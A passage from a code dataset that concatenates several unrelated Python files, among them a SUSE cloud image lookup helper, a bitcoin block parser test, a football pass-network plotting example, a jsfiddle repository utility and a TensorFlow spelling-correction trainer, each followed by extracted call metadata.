version = version_id.strip('"\'')
logging.info('Release version: "%s"' % version)
return version
def get_cloud_config_path():
"""Return the path for the cloud configuration file"""
return '/etc/salt/pillar/cloud.sls'
def get_from_config(config_option):
"""Get the value for the given config option"""
# Expected low usage of this method, re-read the file on an as needed
# basis. If this turns out to be an issue cache the content
config_path = get_cloud_config_path()
with open(config_path) as config_file:
config = yaml.load(config_file.read())
settings = config.get('cloud')
if not settings:
return
return settings.get(config_option)
def get_cluster_image_identifier(framework, region):
"""Return the identifier for the latest cluster node image"""
cluster_image = get_from_config('cluster_image')
if cluster_image:
# The data returned in this code path has built in knowledge
# about the information consumed by the client from the
# full pint data
image_data = {}
image_data['id'] = cluster_image
image_data['name'] = cluster_image
if framework == 'microsoft' and cluster_image.count(':') == 3:
image_data['urn'] = cluster_image
msg = 'Using cluster image from configuration. '
msg += 'Image data for cluster node image: "%s"'
logging.info(msg % image_data)
return image_data
name_filter = 'name~caasp,name~cluster'
flavor = get_from_config('procurement_flavor')
if flavor == 'byos':
name_filter += ',name~byos'
else:
name_filter += ',name!byos'
version = get_caasp_release_version()
name_filter += ',name~' + version.replace('.', '-')
# The cluster image we choose depends on the admin node version,
# thus we cannot just query for active images. We need to get all
# images and then process accordingly.
try:
image_info = ifsrequest.get_image_data(
framework,
None,
'json',
region,
name_filter
)
except Exception as e:
        logging.error('Pint server access failed: "%s"' % e)
# This message will bubble up through salt
return 'See /var/log/caasp_cloud_setup.log'
try:
image_data = json.loads(image_info)
available_images = image_data.get('images', [])
target_image = None
target_image_date = 0
for image in available_images:
image_name = image.get('name')
try:
date = int(RELEASE_DATE.match(image_name).group(1))
if date > target_image_date:
# If we have multiple images with the same date that
# match our filter criteria we have a serious data problem
# we cannot really recover, the first one wins
                    target_image = image
                    target_image_date = date
except Exception:
# Image name with no date stamp skip it
continue
except Exception as e:
        logging.error('Could not load json data from pint: "%s"' % e)
# This message will bubble up through salt
return 'See /var/log/caasp_cloud_setup.log'
if not target_image:
logging.error('Could not determine image identifier for cluster node.')
logging.error('This implies that the pint server is unreachable or the '
'data is incomplete, please report the issue, exiting.')
sys.exit('pint lookup failed')
logging.info('Image data for cluster node image: "%s"' % target_image)
return target_image
def load_platform_module(platform_name):
mod = __import__('caaspadminsetup.%s' % platform_name, fromlist=[''])
return mod
| [((8, 15, 8, 45), 're.compile', 're.compile', ({(8, 26, 8, 44): '"""^.*-v(\\\\d{8})-*.*"""'}, {}), "('^.*-v(\\\\d{8})-*.*')", False, 'import re\n'), ((109, 4, 109, 74), 'logging.info', 'logging.info', ({(109, 17, 109, 73): '(\'Image data for cluster node image: "%s"\' % target_image)'}, {}), '(\'Image data for cluster node image: "%s"\' % target_image)', False, 'import logging\n'), ((56, 8, 56, 38), 'logging.info', 'logging.info', ({(56, 21, 56, 37): '(msg % image_data)'}, {}), '(msg % image_data)', False, 'import logging\n'), ((70, 21, 76, 9), 'susepubliccloudinfoclient.infoserverrequests.get_image_data', 'ifsrequest.get_image_data', ({(71, 12, 71, 21): 'framework', (72, 12, 72, 16): 'None', (73, 12, 73, 18): '"""json"""', (74, 12, 74, 18): 'region', (75, 12, 75, 23): 'name_filter'}, {}), "(framework, None, 'json', region, name_filter)", True, 'import susepubliccloudinfoclient.infoserverrequests as ifsrequest\n'), ((82, 21, 82, 43), 'json.loads', 'json.loads', ({(82, 32, 82, 42): 'image_info'}, {}), '(image_info)', False, 'import json\n'), ((104, 8, 104, 79), 'logging.error', 'logging.error', ({(104, 22, 104, 78): '"""Could not determine image identifier for cluster node."""'}, {}), "('Could not determine image identifier for cluster node.')", False, 'import logging\n'), ((105, 8, 106, 78), 'logging.error', 'logging.error', ({(105, 22, 106, 77): '"""This implies that the pint server is unreachable or the data is incomplete, please report the issue, exiting."""'}, {}), "(\n 'This implies that the pint server is unreachable or the data is incomplete, please report the issue, exiting.'\n )", False, 'import logging\n'), ((107, 8, 107, 38), 'sys.exit', 'sys.exit', ({(107, 17, 107, 37): '"""pint lookup failed"""'}, {}), "('pint lookup failed')", False, 'import sys\n'), ((20, 12, 20, 59), 'logging.info', 'logging.info', ({(20, 25, 20, 58): '(\'Release version: "%s"\' % version)'}, {}), '(\'Release version: "%s"\' % version)', False, 'import logging\n'), ((78, 8, 78, 68), 'logging.error', 'logging.error', ({(78, 22, 78, 67): '(\'Pint server access failed: "%s"\' % e.message)'}, {}), '(\'Pint server access failed: "%s"\' % e.message)', False, 'import logging\n'), ((99, 8, 99, 77), 'logging.error', 'logging.error', ({(99, 22, 99, 76): '(\'Could not load json data from pint: "%s"\' % e.message)'}, {}), '(\'Could not load json data from pint: "%s"\' % e.message)', False, 'import logging\n')] |
simewu/bitcoin_researcher | tools/Bitcoin Parser/blockchain_parser/tests/test_block.py | b9fd2efdb8ae8467c5bd4b3320713a541635df16 | # Copyright (C) 2015-2016 The bitcoin-blockchain-parser developers
#
# This file is part of bitcoin-blockchain-parser.
#
# It is subject to the license terms in the LICENSE file found in the top-level
# directory of this distribution.
#
# No part of bitcoin-blockchain-parser, including this file, may be copied,
# modified, propagated, or distributed except according to the terms contained
# in the LICENSE file.
import unittest
from datetime import datetime
from .utils import read_test_data
from blockchain_parser.block import Block
class TestBlock(unittest.TestCase):
def test_from_hex(self):
block_hex = read_test_data("genesis_block.txt")
block = Block.from_hex(block_hex)
self.assertEqual(1, block.n_transactions)
block_hash = "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1" \
"b60a8ce26f"
self.assertEqual(block_hash, block.hash)
self.assertEqual(486604799, block.header.bits)
merkle_root = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \
"b7afdeda33b"
self.assertEqual(merkle_root, block.header.merkle_root)
self.assertEqual(2083236893, block.header.nonce)
self.assertEqual(1, block.header.version)
self.assertEqual(1, block.header.difficulty)
self.assertEqual(285, block.size)
self.assertEqual(datetime.utcfromtimestamp(1231006505),
block.header.timestamp)
self.assertEqual("0" * 64, block.header.previous_block_hash)
for tx in block.transactions:
self.assertEqual(1, tx.version)
tx_hash = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \
"b7afdeda33b"
self.assertEqual(tx_hash, tx.hash)
self.assertEqual(204, tx.size)
self.assertEqual(0, tx.locktime)
self.assertEqual(0xffffffff, tx.inputs[0].transaction_index)
self.assertEqual(0xffffffff, tx.inputs[0].sequence_number)
self.assertTrue("ffff001d" in tx.inputs[0].script.value)
self.assertEqual("0" * 64, tx.inputs[0].transaction_hash)
self.assertEqual(50 * 100000000, tx.outputs[0].value)
| [((22, 16, 22, 41), 'blockchain_parser.block.Block.from_hex', 'Block.from_hex', ({(22, 31, 22, 40): 'block_hex'}, {}), '(block_hex)', False, 'from blockchain_parser.block import Block\n'), ((35, 25, 35, 62), 'datetime.datetime.utcfromtimestamp', 'datetime.utcfromtimestamp', ({(35, 51, 35, 61): '(1231006505)'}, {}), '(1231006505)', False, 'from datetime import datetime\n')] |
genegeniebio/genegenie-admin | genegenie/admin/__init__.py | 93e9253febc14b17d17a5fbc2eb0e22f1c974083 | '''
DNA++ (c) DNA++ 2017
All rights reserved.
@author: neilswainston
'''
| [] |
pkavousi/similar-users | tests/conftest.py | 8434e0a03dc8dfa218a34601431c564dff3e80b6 | import os
import pandas as pd
import pytest
from user_similarity_model.config.core import DATASET_DIR, config
@pytest.fixture()
def sample_local_data():
"""AI is creating summary for sample_local_data
Returns:
[Dict]: This function returns a dictionary with CSV files which
in dataset folder. The data will be compared in tests against data
that are pulled from Azure PostgreSQL server.
"""
sample_data = {}
for file in config.app_config.csv_files:
sample_data[file[0:-4]] = pd.read_csv(os.path.join(DATASET_DIR, file))
return sample_data
| [((9, 1, 9, 17), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((20, 46, 20, 77), 'os.path.join', 'os.path.join', ({(20, 59, 20, 70): 'DATASET_DIR', (20, 72, 20, 76): 'file'}, {}), '(DATASET_DIR, file)', False, 'import os\n')] |
chrisjen83/rfb_weather_obs | weather/apps.py | 8eab16358c5059655d208ef41aa38692fa21776f | from django.apps import AppConfig
import logging
logger = logging.getLogger(__name__)
class WeatherConfig(AppConfig):
name = 'weather'
def ready(self):
from forecastUpdater import updater
updater.start()
| [((4, 9, 4, 36), 'logging.getLogger', 'logging.getLogger', ({(4, 27, 4, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((12, 8, 12, 23), 'forecastUpdater.updater.start', 'updater.start', ({}, {}), '()', False, 'from forecastUpdater import updater\n')] |
fleimgruber/python | projects/django-filer/test.py | 2e735762c73651cffc027ca850b2a58d87d54b49 | import filer
import tests
| [] |
DymondFormation/mplsoccer | examples/plots/plot_pass_network.py | 544300857ec5936781e12fda203cf2df8a3d00b9 | """
============
Pass Network
============
This example shows how to plot passes between players in a set formation.
"""
import pandas as pd
from mplsoccer.pitch import Pitch
from matplotlib.colors import to_rgba
import numpy as np
from mplsoccer.statsbomb import read_event, EVENT_SLUG
##############################################################################
# Set team and match info, and get event and tactics dataframes for the defined match_id
match_id = 15946
team = 'Barcelona'
opponent = 'Alavés (A), 2018/19 La Liga'
event_dict = read_event(f'{EVENT_SLUG}/{match_id}.json', warn=False)
players = event_dict['tactics_lineup']
events = event_dict['event']
##############################################################################
# Adding on the last tactics id and formation for the team for each event
events.loc[events.tactics_formation.notnull(), 'tactics_id'] = events.loc[
events.tactics_formation.notnull(), 'id']
events[['tactics_id', 'tactics_formation']] = events.groupby('team_name')[[
'tactics_id', 'tactics_formation']].ffill()
##############################################################################
# Add the abbreviated player position to the players dataframe
formation_dict = {1: 'GK', 2: 'RB', 3: 'RCB', 4: 'CB', 5: 'LCB', 6: 'LB', 7: 'RWB',
8: 'LWB', 9: 'RDM', 10: 'CDM', 11: 'LDM', 12: 'RM', 13: 'RCM',
14: 'CM', 15: 'LCM', 16: 'LM', 17: 'RW', 18: 'RAM', 19: 'CAM',
20: 'LAM', 21: 'LW', 22: 'RCF', 23: 'ST', 24: 'LCF', 25: 'SS'}
players['position_abbreviation'] = players.player_position_id.map(formation_dict)
##############################################################################
# Add on the substitutions to the players dataframe, i.e. where players are subbed on
# but the formation doesn't change
sub = events.loc[events.type_name == 'Substitution',
['tactics_id', 'player_id', 'substitution_replacement_id',
'substitution_replacement_name']]
players_sub = players.merge(sub.rename({'tactics_id': 'id'}, axis='columns'),
on=['id', 'player_id'], how='inner', validate='1:1')
players_sub = (players_sub[['id', 'substitution_replacement_id', 'position_abbreviation']]
.rename({'substitution_replacement_id': 'player_id'}, axis='columns'))
players = pd.concat([players, players_sub])
players.rename({'id': 'tactics_id'}, axis='columns', inplace=True)
players = players[['tactics_id', 'player_id', 'position_abbreviation']]
##############################################################################
# Add player position information to the events dataframe
# add on the position the player was playing in the formation to the events dataframe
events = events.merge(players, on=['tactics_id', 'player_id'], how='left', validate='m:1')
# add on the position the recipient was playing in the formation to the events dataframe
events = events.merge(players.rename({'player_id': 'pass_recipient_id'},
axis='columns'), on=['tactics_id', 'pass_recipient_id'],
how='left', validate='m:1', suffixes=['', '_receipt'])
##############################################################################
# Create dataframes for passes and player locations
# get a dataframe with all passes
mask_pass = (events.team_name == team) & (events.type_name == 'Pass')
to_keep = ['id', 'match_id', 'player_id', 'player_name', 'outcome_name', 'pass_recipient_id',
'pass_recipient_name', 'x', 'y', 'end_x', 'end_y', 'tactics_id', 'tactics_formation',
'position_abbreviation', 'position_abbreviation_receipt']
passes = events.loc[mask_pass, to_keep].copy()
print('Formations used by {} in match: '.format(team), passes['tactics_formation'].unique())
##############################################################################
# Filter passes by chosen formation, then group all passes and receipts to
# calculate avg x, avg y, count of events for each slot in the formation
formation = 433
passes_formation = passes[(passes.tactics_formation == formation) &
(passes.position_abbreviation_receipt.notnull())].copy()
passer_passes = passes_formation[['position_abbreviation', 'x', 'y']].copy()
recipient_passes = passes_formation[['position_abbreviation_receipt', 'end_x', 'end_y']].copy()
# rename columns to match those in passer_passes
recipient_passes.rename({'position_abbreviation_receipt': 'position_abbreviation',
'end_x': 'x', 'end_y': 'y'}, axis='columns', inplace=True)
# create a new dataframe containing all individual passes and receipts from passes_formation
appended_passes = pd.concat(objs=[passer_passes, recipient_passes], ignore_index=True)
average_locs_and_count = appended_passes.groupby('position_abbreviation').agg({
'x': ['mean'], 'y': ['mean', 'count']})
average_locs_and_count.columns = ['x', 'y', 'count']
##############################################################################
# Group the passes by unique pairings of players and add the avg player positions to this dataframe
# calculate the number of passes between each position (using min/ max so we get passes both ways)
passes_formation['pos_max'] = passes_formation[['position_abbreviation',
'position_abbreviation_receipt']].max(axis='columns')
passes_formation['pos_min'] = passes_formation[['position_abbreviation',
'position_abbreviation_receipt']].min(axis='columns')
passes_between = passes_formation.groupby(['pos_min', 'pos_max']).id.count().reset_index()
passes_between.rename({'id': 'pass_count'}, axis='columns', inplace=True)
# add on the location of each player so we have the start and end positions of the lines
passes_between = passes_between.merge(average_locs_and_count, left_on='pos_min', right_index=True)
passes_between = passes_between.merge(average_locs_and_count, left_on='pos_max', right_index=True,
suffixes=['', '_end'])
##############################################################################
# Calculate the line width and marker sizes relative to the largest counts
max_line_width = 18
max_marker_size = 3000
passes_between['width'] = passes_between.pass_count / passes_between.pass_count.max() * max_line_width
average_locs_and_count['marker_size'] = (average_locs_and_count['count']
/ average_locs_and_count['count'].max() * max_marker_size)
##############################################################################
# Set color to make the lines more transparent when fewer passes are made
min_transparency = 0.3
color = np.array(to_rgba('white'))
color = np.tile(color, (len(passes_between), 1))
c_transparency = passes_between.pass_count / passes_between.pass_count.max()
c_transparency = (c_transparency * (1 - min_transparency)) + min_transparency
color[:, 3] = c_transparency
##############################################################################
# Plotting
pitch = Pitch(pitch_type='statsbomb', orientation='horizontal',
pitch_color='#22312b', line_color='#c7d5cc', figsize=(16, 11),
constrained_layout=True, tight_layout=False)
fig, ax = pitch.draw()
pass_lines = pitch.lines(passes_between.x, passes_between.y,
passes_between.x_end, passes_between.y_end, lw=passes_between.width,
color=color, zorder=1, ax=ax)
pass_nodes = pitch.scatter(average_locs_and_count.x, average_locs_and_count.y, s=average_locs_and_count.marker_size,
color='red', edgecolors='black', linewidth=1, alpha=1, ax=ax)
for index, row in average_locs_and_count.iterrows():
pitch.annotate(row.name, xy=(row.x, row.y), c='white', va='center', ha='center', size=16, weight='bold', ax=ax)
title = ax.set_title("{} {} Formation vs {}".format(team, formation, opponent), size=28, y=0.97, color='#c7d5cc')
fig.set_facecolor("#22312b")
| [((21, 13, 21, 68), 'mplsoccer.statsbomb.read_event', 'read_event', (), '', False, 'from mplsoccer.statsbomb import read_event, EVENT_SLUG\n'), ((53, 10, 53, 43), 'pandas.concat', 'pd.concat', ({(53, 20, 53, 42): '[players, players_sub]'}, {}), '([players, players_sub])', True, 'import pandas as pd\n'), ((91, 18, 91, 86), 'pandas.concat', 'pd.concat', (), '', True, 'import pandas as pd\n'), ((133, 8, 135, 58), 'mplsoccer.pitch.Pitch', 'Pitch', (), '', False, 'from mplsoccer.pitch import Pitch\n'), ((124, 17, 124, 33), 'matplotlib.colors.to_rgba', 'to_rgba', ({(124, 25, 124, 32): '"""white"""'}, {}), "('white')", False, 'from matplotlib.colors import to_rgba\n')] |
andrewp-as-is/jsfiddle-factory.py | jsfiddle_factory/__init__.py | 7b8b883676f3330f5714b15157819b583a753ba1 | __all__ = ['Factory']
import jsfiddle_build
import jsfiddle_github
import jsfiddle_generator
import jsfiddle_readme_generator
import getdirs
import getfiles
import os
import popd
import yaml
@popd.popd
def _build(path):
os.chdir(path)
jsfiddle_build.Build().save("build.html")
@popd.popd
def _init(path):
os.chdir(path)
isempty = len(os.listdir(path)) == 0
isfiddle = len(
list(filter(os.path.exists, ["demo.css", "demo.js", "demo.html"]))) > 0
if isempty or isfiddle:
jsfiddle_generator.JSFiddleRepo().create()
@popd.popd
def _readme(path):
os.chdir(path)
jsfiddle_readme_generator.Readme().save("README.md")
class Factory:
"""attrs: `path`. methods: `detox()`, `init()`, `build()`, `readme()`, `update_resources()`"""
path = None
def __init__(self, path=None):
if not path:
path = os.getcwd()
self.path = path
def build_html(self):
files = getfiles.getfiles(self.path)
matches = ["demo.html", "fiddle.html"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
_build(os.path.dirname(f))
def create_readme(self):
files = getfiles.getfiles(self.path)
matches = ["demo.html", "fiddle.html"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
_readme(os.path.dirname(f))
def init(self):
for path in getdirs.getdirs(self.path):
_init(path)
def detox(self):
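        # Keep sanitizing directory names until a full pass over the tree renames nothing.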
renamed = True
while renamed:
renamed = False
for path in getdirs.getdirs(self.path):
relpath = os.path.relpath(path, os.getcwd())
new_relpath = jsfiddle_github.sanitize(relpath)
new_path = os.path.join(os.getcwd(), new_relpath)
ishidden = relpath[0] == "." and "%s." % os.sep not in relpath
if not ishidden and new_relpath != relpath:
os.rename(path, new_path)
print("%s -> %s" % (path, new_path))
renamed = True
break
def update_resources(self):
f = os.path.join(self.path, "resources.txt")
if not os.path.exists(f):
print("SKIP: %s NOT EXISTS" % f)
resources = list(filter(None, open(f).read().splitlines()))
files = getfiles.getfiles(self.path)
matches = ["demo.details", "fiddle.manifest"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
if os.path.exists(f):
data = yaml.load(open(f, 'r'))
if data.get("resources", []) != resources:
data["resources"] = resources
yaml.dump(data, open(f, 'w'), default_flow_style=False)
| [((17, 4, 17, 18), 'os.chdir', 'os.chdir', ({(17, 13, 17, 17): 'path'}, {}), '(path)', False, 'import os\n'), ((23, 4, 23, 18), 'os.chdir', 'os.chdir', ({(23, 13, 23, 17): 'path'}, {}), '(path)', False, 'import os\n'), ((33, 4, 33, 18), 'os.chdir', 'os.chdir', ({(33, 13, 33, 17): 'path'}, {}), '(path)', False, 'import os\n'), ((47, 16, 47, 44), 'getfiles.getfiles', 'getfiles.getfiles', ({(47, 34, 47, 43): 'self.path'}, {}), '(self.path)', False, 'import getfiles\n'), ((53, 16, 53, 44), 'getfiles.getfiles', 'getfiles.getfiles', ({(53, 34, 53, 43): 'self.path'}, {}), '(self.path)', False, 'import getfiles\n'), ((59, 20, 59, 46), 'getdirs.getdirs', 'getdirs.getdirs', ({(59, 36, 59, 45): 'self.path'}, {}), '(self.path)', False, 'import getdirs\n'), ((78, 12, 78, 52), 'os.path.join', 'os.path.join', ({(78, 25, 78, 34): 'self.path', (78, 36, 78, 51): '"""resources.txt"""'}, {}), "(self.path, 'resources.txt')", False, 'import os\n'), ((82, 16, 82, 44), 'getfiles.getfiles', 'getfiles.getfiles', ({(82, 34, 82, 43): 'self.path'}, {}), '(self.path)', False, 'import getfiles\n'), ((18, 4, 18, 26), 'jsfiddle_build.Build', 'jsfiddle_build.Build', ({}, {}), '()', False, 'import jsfiddle_build\n'), ((24, 18, 24, 34), 'os.listdir', 'os.listdir', ({(24, 29, 24, 33): 'path'}, {}), '(path)', False, 'import os\n'), ((34, 4, 34, 38), 'jsfiddle_readme_generator.Readme', 'jsfiddle_readme_generator.Readme', ({}, {}), '()', False, 'import jsfiddle_readme_generator\n'), ((43, 19, 43, 30), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((66, 24, 66, 50), 'getdirs.getdirs', 'getdirs.getdirs', ({(66, 40, 66, 49): 'self.path'}, {}), '(self.path)', False, 'import getdirs\n'), ((79, 15, 79, 32), 'os.path.exists', 'os.path.exists', ({(79, 30, 79, 31): 'f'}, {}), '(f)', False, 'import os\n'), ((85, 15, 85, 32), 'os.path.exists', 'os.path.exists', ({(85, 30, 85, 31): 'f'}, {}), '(f)', False, 'import os\n'), ((28, 8, 28, 41), 'jsfiddle_generator.JSFiddleRepo', 'jsfiddle_generator.JSFiddleRepo', ({}, {}), '()', False, 'import jsfiddle_generator\n'), ((50, 19, 50, 37), 'os.path.dirname', 'os.path.dirname', ({(50, 35, 50, 36): 'f'}, {}), '(f)', False, 'import os\n'), ((56, 20, 56, 38), 'os.path.dirname', 'os.path.dirname', ({(56, 36, 56, 37): 'f'}, {}), '(f)', False, 'import os\n'), ((68, 30, 68, 63), 'jsfiddle_github.sanitize', 'jsfiddle_github.sanitize', ({(68, 55, 68, 62): 'relpath'}, {}), '(relpath)', False, 'import jsfiddle_github\n'), ((49, 34, 49, 53), 'os.path.basename', 'os.path.basename', ({(49, 51, 49, 52): 'f'}, {}), '(f)', False, 'import os\n'), ((55, 34, 55, 53), 'os.path.basename', 'os.path.basename', ({(55, 51, 55, 52): 'f'}, {}), '(f)', False, 'import os\n'), ((67, 48, 67, 59), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((69, 40, 69, 51), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((72, 20, 72, 45), 'os.rename', 'os.rename', ({(72, 30, 72, 34): 'path', (72, 36, 72, 44): 'new_path'}, {}), '(path, new_path)', False, 'import os\n'), ((84, 34, 84, 53), 'os.path.basename', 'os.path.basename', ({(84, 51, 84, 52): 'f'}, {}), '(f)', False, 'import os\n')] |
MartinXPN/SpellNN | spellnn/train.py | e3226fbff359ef60360e63bf7b80a7e1c909e7d8 | import logging
import os
from datetime import datetime
from inspect import signature, Parameter
from pathlib import Path
from pprint import pprint
from textwrap import dedent
from typing import Optional, Union
import fire
import tensorflow as tf
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard, TerminateOnNaN
from tensorflow.keras import Model
from spellnn import models
from spellnn.data import alphabet
from spellnn.data.alphabet import get_chars
from spellnn.data.processing import DataProcessor
from spellnn.data.util import nb_lines
from spellnn.layers.mapping import CharMapping
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # FATAL
logging.getLogger('tensorflow').setLevel(logging.FATAL)
class Gym:
def __init__(self):
self.train_dataset: Optional[tf.data.Dataset] = None
self.valid_dataset: Optional[tf.data.Dataset] = None
self.char2int: Optional[CharMapping] = None
self.model: Optional[Model] = None
self.nb_train_samples: int = 0
self.nb_valid_samples: int = 0
self.batch_size = 0
def construct_dataset(self, path: str, locale: str, batch_size: int = 32, validation_split: float = 0.3):
pprint(locals())
all_chars = [alphabet.START, alphabet.END] + get_chars(locale)
char_weights = [0.5 if c.isalpha() and c.islower() else
0.2 if c.isalpha() else
0.1 if c not in {alphabet.START, alphabet.END} else
0 for c in all_chars]
self.char2int = CharMapping(chars=all_chars, include_unknown=True)
data_processor = DataProcessor(locale=locale, char2id=self.char2int,
alphabet=all_chars, alphabet_weighs=char_weights)
print('Calculating number of lines in the file...', end=' ')
all_samples = nb_lines(path)
print(all_samples)
self.batch_size = batch_size
self.nb_train_samples = int((1 - validation_split) * all_samples)
self.nb_valid_samples = all_samples - self.nb_train_samples
dataset = tf.data.TextLineDataset(path)
self.train_dataset = dataset.take(self.nb_train_samples)
self.train_dataset = self.train_dataset.shuffle(10 * batch_size, seed=42, reshuffle_each_iteration=True)
self.train_dataset = self.train_dataset.batch(batch_size, drop_remainder=True)
self.train_dataset = self.train_dataset.map(
lambda b: tf.numpy_function(func=data_processor.process_batch, inp=[b], Tout=['int32', 'int32', 'int32']))
self.train_dataset = self.train_dataset.map(lambda enc_in, dec_in, targ: ((enc_in, dec_in), targ))
self.train_dataset = self.train_dataset.repeat()
self.valid_dataset = dataset.skip(self.nb_train_samples)
self.valid_dataset = self.valid_dataset.shuffle(10 * batch_size, seed=42, reshuffle_each_iteration=True)
self.valid_dataset = self.valid_dataset.batch(batch_size, drop_remainder=True)
self.valid_dataset = self.valid_dataset.map(
lambda b: tf.numpy_function(func=data_processor.process_batch, inp=[b], Tout=['int32', 'int32', 'int32']))
self.valid_dataset = self.valid_dataset.map(lambda enc_in, dec_in, targ: ((enc_in, dec_in), targ))
self.valid_dataset = self.valid_dataset.repeat()
return self
def create_model(self, name):
arguments = signature(getattr(models, name).__init__)
arguments = {k: v.default for k, v in arguments.parameters.items()
if v.default is not Parameter.empty and k != 'self'}
arguments['nb_symbols'] = len(self.char2int)
arg_str = ', '.join([f'{k}=' + str(v) if type(v) != str else f'{k}=' '"' + str(v) + '"'
for k, v in arguments.items()])
# print(arg_str)
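        # Dynamically define a factory method named after the model class, whose keyword
        # arguments mirror the model constructor's defaults, and attach it to this Gym instance.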
exec(dedent(f'''
def create({arg_str}):
self.model = {name}(**locals())
return self
create.__name__ = {name}.__name__
create.__doc__ = {name}.__init__.__doc__
setattr(self, create.__name__, create)
'''), {'self': self, name: getattr(models, name), arg_str: arg_str})
return getattr(self, name)
def train(self, epochs: int, monitor_metric='val_acc', patience: int = 5,
steps_per_epoch: Union[int, str] = 'auto', validation_steps: Union[int, str] = 'auto',
log_dir: str = 'logs',
use_multiprocessing: bool = False):
pprint(locals())
log_dir = Path(log_dir).joinpath(datetime.now().replace(microsecond=0).isoformat())
model_path = Path(log_dir).joinpath('checkpoints').joinpath('best-model.h5py')
model_path = str(model_path)
if steps_per_epoch == 'auto':
steps_per_epoch = self.nb_train_samples // self.batch_size
if validation_steps == 'auto':
validation_steps = self.nb_valid_samples // self.batch_size
self.model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['acc'])
history = self.model.fit_generator(
self.train_dataset.as_numpy_iterator(), steps_per_epoch=steps_per_epoch,
validation_data=self.valid_dataset.as_numpy_iterator(), validation_steps=validation_steps,
epochs=epochs,
use_multiprocessing=use_multiprocessing, workers=os.cpu_count() - 1,
callbacks=[
TerminateOnNaN(),
TensorBoard(log_dir=log_dir),
ModelCheckpoint(model_path, monitor=monitor_metric, verbose=1, save_best_only=True),
EarlyStopping(monitor=monitor_metric, patience=patience),
])
return history.history
if __name__ == '__main__':
cli = Gym()
fire.Fire(cli)
| [((122, 4, 122, 18), 'fire.Fire', 'fire.Fire', ({(122, 14, 122, 17): 'cli'}, {}), '(cli)', False, 'import fire\n'), ((23, 0, 23, 31), 'logging.getLogger', 'logging.getLogger', ({(23, 18, 23, 30): '"""tensorflow"""'}, {}), "('tensorflow')", False, 'import logging\n'), ((43, 24, 43, 74), 'spellnn.layers.mapping.CharMapping', 'CharMapping', (), '', False, 'from spellnn.layers.mapping import CharMapping\n'), ((44, 25, 45, 88), 'spellnn.data.processing.DataProcessor', 'DataProcessor', (), '', False, 'from spellnn.data.processing import DataProcessor\n'), ((48, 22, 48, 36), 'spellnn.data.util.nb_lines', 'nb_lines', ({(48, 31, 48, 35): 'path'}, {}), '(path)', False, 'from spellnn.data.util import nb_lines\n'), ((55, 18, 55, 47), 'tensorflow.data.TextLineDataset', 'tf.data.TextLineDataset', ({(55, 42, 55, 46): 'path'}, {}), '(path)', True, 'import tensorflow as tf\n'), ((38, 53, 38, 70), 'spellnn.data.alphabet.get_chars', 'get_chars', ({(38, 63, 38, 69): 'locale'}, {}), '(locale)', False, 'from spellnn.data.alphabet import get_chars\n'), ((81, 13, 88, 12), 'textwrap.dedent', 'dedent', ({(81, 20, 88, 11): 'f"""\n def create({arg_str}):\n self.model = {name}(**locals())\n return self\n create.__name__ = {name}.__name__\n create.__doc__ = {name}.__init__.__doc__\n setattr(self, create.__name__, create)\n """'}, {}), '(\n f"""\n def create({arg_str}):\n self.model = {name}(**locals())\n return self\n create.__name__ = {name}.__name__\n create.__doc__ = {name}.__init__.__doc__\n setattr(self, create.__name__, create)\n """\n )', False, 'from textwrap import dedent\n'), ((60, 22, 60, 117), 'tensorflow.numpy_function', 'tf.numpy_function', (), '', True, 'import tensorflow as tf\n'), ((68, 22, 68, 117), 'tensorflow.numpy_function', 'tf.numpy_function', (), '', True, 'import tensorflow as tf\n'), ((96, 18, 96, 31), 'pathlib.Path', 'Path', ({(96, 23, 96, 30): 'log_dir'}, {}), '(log_dir)', False, 'from pathlib import Path\n'), ((110, 61, 110, 75), 'os.cpu_count', 'os.cpu_count', ({}, {}), '()', False, 'import os\n'), ((112, 16, 112, 32), 'tensorflow.keras.callbacks.TerminateOnNaN', 'TerminateOnNaN', ({}, {}), '()', False, 'from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard, TerminateOnNaN\n'), ((113, 16, 113, 44), 'tensorflow.keras.callbacks.TensorBoard', 'TensorBoard', (), '', False, 'from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard, TerminateOnNaN\n'), ((114, 16, 114, 99), 'tensorflow.keras.callbacks.ModelCheckpoint', 'ModelCheckpoint', (), '', False, 'from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard, TerminateOnNaN\n'), ((115, 16, 115, 72), 'tensorflow.keras.callbacks.EarlyStopping', 'EarlyStopping', (), '', False, 'from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard, TerminateOnNaN\n'), ((97, 21, 97, 34), 'pathlib.Path', 'Path', ({(97, 26, 97, 33): 'log_dir'}, {}), '(log_dir)', False, 'from pathlib import Path\n'), ((96, 41, 96, 55), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n')] |
juliuskunze/flax | flax/core/frozen_dict.py | 929395cf5c7391bca3e33ef6760ff9591401d19e | # Copyright 2020 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Frozen Dictionary."""
from typing import TypeVar, Mapping, Dict, Tuple
from flax import serialization
import jax
K = TypeVar('K')
V = TypeVar('V')
@jax.tree_util.register_pytree_node_class
class FrozenDict(Mapping[K, V]):
"""An immutable variant of the Python dict."""
